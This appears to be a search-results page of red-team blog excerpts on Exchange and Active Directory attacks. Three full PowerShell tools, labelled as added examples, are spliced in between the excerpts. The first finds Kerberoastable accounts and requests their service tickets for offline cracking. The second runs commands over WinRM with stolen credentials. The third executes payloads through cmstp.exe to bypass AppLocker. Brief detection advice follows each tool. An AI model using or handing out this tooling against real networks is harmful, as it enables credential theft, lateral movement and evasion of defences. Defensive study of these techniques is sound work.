118 matches found
Microsoft Exchange – Privilege Escalation
Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However, information stored in emails can be highly sensitive for an organisation, and therefore a threat actor's focus can be to exfiltrate dat...
Microsoft Exchange – ACL
During Microsoft Exchange installation a number of security groups related to Exchange are created in Active Directory. Some of these groups are linked to each other and could allow domain escalation via abuse of access control lists. Specifically, user accounts that are members of the Organisati...
Microsoft Exchange – Mailbox Post Compromise
Gaining access to the mailbox of a domain user gives the opportunity for a list of activities that could potentially expand the access of the red team. The trust relationships of the compromised user can be utilised to perform a more efficient phishing or NTLM relay attack in order to gain access ...
Microsoft Exchange – Code Execution
Gaining access to the mailbox of a domain user can lead to execution of arbitrary code by utilising the credentials that have been discovered. Various techniques have been discovered by Nick Landers and Etienne Stalmans that involve the abuse of common Outlook functionality in order to execute...
Microsoft Exchange – NTLM Relay
Gaining access to the mailbox of a user during a penetration test or a red team engagement can lead to arbitrary code execution, discovery of sensitive data such as credentials, or performing internal phishing to expand access across the network. Typically, access to the mailbox is achieved via...
Microsoft Exchange – Password Spraying
Outlook Web Access (OWA) portals are typically externally facing in order to allow users to access their emails from the Internet. This gives threat actors the opportunity to try a common password against a valid list of usernames (password spraying) in order to get some initial access to t...
Microsoft Exchange – Domain Escalation
Microsoft Exchange servers are a high-value target for red teams as they are the main entry point for the majority of external attacks. From an internal perspective, if an initial foothold on the network has already been achieved, Exchange can allow a user to obtain privileges that would allow him ...
Dumping Domain Password Hashes
It is very common during penetration tests, once domain administrator access has been achieved, to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file on the domain controller (NTDS.DIT) with some additional information li...
Kerberoast
The process of requesting Kerberos service tickets, cracking them offline and rewriting them in order to gain access to the targeted service is called Kerberoast. This is a very common attack in red team engagements since it doesn't require any interaction with the service, as legitimate Active Directory access can be used ...
Command and Control – Browser
Red teams are always focused on the discovery of innovative ways to establish connections back to their command and control infrastructure. The main reason that leads red teams to use standard protocols or native system functionality for command and control operations is to bypass some sort of...
SPN Discovery
Services that support Kerberos authentication require an associated Service Principal Name (SPN) to point users to the appropriate resource for connection. Discovery of SPNs inside an internal network is performed via LDAP queries and can assist red teams in identifying hosts that are running...
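The LDAP query behind SPN discovery and the ticket request behind Kerberoast are two halves of one workflow, so the following single example serves both the Kerberoast entry above and this SPN Discovery entry. It is an added example, not code from the original posts; it assumes a domain-joined host running in the context of any authenticated domain user, and the LDAP filter and property list are choices made here, not something the posts prescribe.

```powershell
# Added example: enumerate user accounts that carry an SPN via LDAP, then ask
# the KDC for a service ticket for each SPN so it lands in the ticket cache.
# Assumes a domain-joined host and a current domain user context.

function Get-DomainSpn {
    param(
        # Only user accounts: computer accounts have random 120-character
        # passwords, so their tickets are not worth cracking. Disabled accounts
        # are excluded with the userAccountControl bitwise match.
        [string]$Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    )
    $root = [ADSI]'LDAP://RootDSE'
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]("LDAP://" + $root.defaultNamingContext)
    $searcher.Filter = $Filter
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(@('samaccountname', 'serviceprincipalname', 'pwdlastset'))
    foreach ($r in $searcher.FindAll()) {
        foreach ($spn in $r.Properties['serviceprincipalname']) {
            [pscustomobject]@{
                SamAccountName = [string]$r.Properties['samaccountname'][0]
                SPN            = $spn
                # Old pwdLastSet values hint at weak, never-rotated passwords.
                PwdLastSet     = [datetime]::FromFileTime([int64]$r.Properties['pwdlastset'][0])
            }
        }
    }
}

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string[]]$Spn)
    Add-Type -AssemblyName System.IdentityModel
    foreach ($s in $Spn) {
        try {
            # Builds an AP-REQ for the SPN; doing so makes the KDC issue a TGS
            # encrypted with the service account's key and caches it locally.
            $token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $s
            [pscustomobject]@{ SPN = $s; Requested = $true; Bytes = $token.GetRequest().Length }
        } catch {
            [pscustomobject]@{ SPN = $s; Requested = $false; Bytes = 0 }
        }
    }
}

# Usage: list the SPNs, request a ticket per unique SPN, then show the cache.
$spns = Get-DomainSpn
$spns | Format-Table SamAccountName, SPN, PwdLastSet -AutoSize
Request-ServiceTicket -Spn ($spns.SPN | Select-Object -Unique)
klist
```

Nothing here touches the target service: the only traffic is LDAP to a DC and TGS-REQs to the KDC, which is the point made in the Kerberoast entry. The cached tickets are then exported (for instance with mimikatz' kerberos::list /export) and cracked offline; a ticket issued with RC4 (etype 23) is the quick win, so a defender can both alert on bursts of TGS-REQs with etype 23 (Event ID 4769) and remove the incentive by giving service accounts long random passwords or using group Managed Service Accounts.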
Situational Awareness
A common step in the life-cycle of a red team engagement is to gather as much information as possible about the compromised environment and the domain network. This activity is often called situational awareness, and there is no defined list of commands that a red teamer should execute. However, all...
Lateral Movement – WinRM
WinRM stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is performed over SOAP via HTTP (port 5985) or HTTPS (port 5986); the service supports Kerberos and NTLM authentication by default, and Basic authentication can also be enabled. Usage of this servi...
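The ports and authentication methods mentioned above translate directly into how a session is opened from the attacker's side. The following is an added example rather than code from the original post; the hostname, the account name and the executed commands are placeholders, and it assumes the credentials in hand are valid for a local administrator or a member of the target's Remote Management Users group.

```powershell
# Added example: probe the two WinRM ports, then open a session and run a
# command over it. Hostnames, account and commands are placeholders.

function Test-WinRMPort {
    param([Parameter(Mandatory)][string]$ComputerName)
    foreach ($p in 5985, 5986) {
        $client = New-Object System.Net.Sockets.TcpClient
        try {
            $ar   = $client.BeginConnect($ComputerName, $p, $null, $null)
            $open = $ar.AsyncWaitHandle.WaitOne(1500) -and $client.Connected
        } catch { $open = $false } finally { $client.Close() }
        [pscustomobject]@{ ComputerName = $ComputerName; Port = $p; Open = $open }
    }
}

function Invoke-WinRMCommand {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [scriptblock]$ScriptBlock = { whoami; hostname },
        [switch]$UseSSL
    )
    $conn = @{ ComputerName = $ComputerName }
    if ($UseSSL) { $conn.UseSSL = $true; $conn.Port = 5986 }
    # The WS-Management Identify exchange confirms a WinRM listener without
    # authenticating, so a failure here is a network/listener problem and not
    # a credential problem.
    Test-WSMan @conn -ErrorAction Stop | Out-Null
    $session = New-PSSession @conn -Credential $Credential -ErrorAction Stop
    try {
        Invoke-Command -Session $session -ScriptBlock $ScriptBlock
    } finally {
        Remove-PSSession $session
    }
}

# Usage. Addressing the target by domain FQDN yields Kerberos; addressing it by
# IP address forces NTLM, which the client only allows after the host is added
# to TrustedHosts:
#   Set-Item WSMan:\localhost\Client\TrustedHosts -Value '10.0.0.5' -Concatenate -Force
$cred = Get-Credential 'CORP\svc_backup'
Test-WinRMPort -ComputerName 'fs01.corp.local'
Invoke-WinRMCommand -ComputerName 'fs01.corp.local' -Credential $cred
```

The choice between name and IP address is not cosmetic: NTLM over WinRM is what makes the service a relay target, while Kerberos ties the session to the SPN of the host. Basic authentication sends the credentials base64-encoded and should only ever be used, or allowed by a listener, over the HTTPS port.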
AppLocker Bypass – CMSTP
CMSTP is a binary associated with the Microsoft Connection Manager Profile Installer. It accepts INF files, which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets (SCT) and DLLs. It is a trusted Microsoft binary which is located in the...
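The weaponised INF the entry refers to relies on the RunPreSetupCommands section, which cmstp.exe executes before installing the connection profile. The following added example (not the original post's code) writes such a profile with a harmless calc.exe stand-in for the payload and invokes it; the profile name, file path and payload are illustrative choices.

```powershell
# Added example: minimal INF whose pre-setup commands cmstp.exe runs for us.
# The payload, profile name and file path are illustrative placeholders.

$inf = @'
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Every line here is run as a command by cmstp.exe before the profile install;
; the second line kills cmstp.exe so no installer dialog is left on screen.
calc.exe
taskkill /IM cmstp.exe /F

[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
'@

$path = Join-Path $env:TEMP 'corpvpn.inf'
Set-Content -Path $path -Value $inf -Encoding ASCII

# /ni = no desktop icon, /s = silent. The commands run as children of a
# Microsoft-signed binary from System32, which is what lets them through
# whitelisting rules that trust publisher or path.
& "$env:SystemRoot\System32\cmstp.exe" /ni /s $path
```

Replacing calc.exe with the usual regsvr32 /u /n /s /i:<scriptlet> scrobj.dll line gives the SCT variant the entry mentions. Because the parent is always cmstp.exe, a detection rule on cmstp.exe spawning any child process, or on its command line containing both /ni and /s, covers the technique regardless of payload.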
PDF – NTLM Hashes
Client-side attacks are heavily used in red team engagements as they can allow the red team to execute arbitrary code or retrieve password hashes. Usually Microsoft Office products are used to perform these kinds of attacks; however, PDF documents can also be utilised for obtaining NTLM hashes of...
NBNS Spoofing
The NetBIOS Name Service (NBT-NS) is used in Windows networks for communication between hosts. Systems fall back to this service when name resolution via LMHOSTS and DNS fails. Abusing this service to perform a man-in-the-middle attack is a common tactic that has been widely used by penetration testers and...
Lateral Movement – RDP
The Remote Desktop Protocol (RDP) is widely used across internal networks by administrators. This allows system owners and admins to manage Windows environments remotely. However, RDP can give an attacker various opportunities to conduct attacks that can be used for lateral movement in red team...
DCShadow
DCShadow is an attack which tries to modify existing data in Active Directory by using legitimate APIs which are used by domain controllers. This technique can be used from a workstation as a post-domain-compromise tactic for establishing domain persistence, bypassing most SIEM solutions...